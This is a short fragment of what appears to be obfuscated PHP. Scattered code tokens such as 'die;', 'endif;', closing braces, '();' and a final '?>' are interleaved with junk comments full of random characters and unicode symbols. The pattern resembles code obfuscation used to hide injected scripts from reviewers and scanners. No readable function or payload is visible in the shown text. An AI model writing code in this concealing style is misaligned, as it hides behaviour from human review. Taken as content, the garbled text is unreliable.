)uHs@t9℮✞▋♂※

-*///
]/*-

Ⓞ➮┛◿╠⅑➤℉≒Ⅲ⑻

)M+<DⓄ➮┛◿╠⅑➤℉≒Ⅲ⑻

-*///
);/*-
┘◉≡➚☁
eNN<u_)a┘◉≡➚☁
-*///
/*-,@`s0-*///
die;/*-Z`BK.-*///
 endif;/*-
╤♒❄Ü⒘☱☻⑿☵ღ➤⑲╞♟ⓢ⒅⋋➬∮￡➸⏎☦≱≗◅⋥
{yE╤♒❄Ü⒘☱☻⑿☵ღ➤⑲╞♟ⓢ⒅⋋➬∮￡➸⏎☦≱≗◅⋥
-*///
 }/*-;0~%-*///
}/*-
➅⊰┼┵ⅼ●ⅻ☏⒫✃⒦≌⋷⋿⑩
7{!NEb(p6w➅⊰┼┵ⅼ●ⅻ☏⒫✃⒦≌⋷⋿⑩
-*///
PxSQ/*-%scQYoo-*///
::/*-


▴◬◠◃∎②︾∕✭☀✲➓⅔


&GZEn!DS▴◬◠◃∎②︾∕✭☀✲➓⅔


-*///
VOsHm/*-CQ%-*///
();/*-eaR`zG-*///
 ?>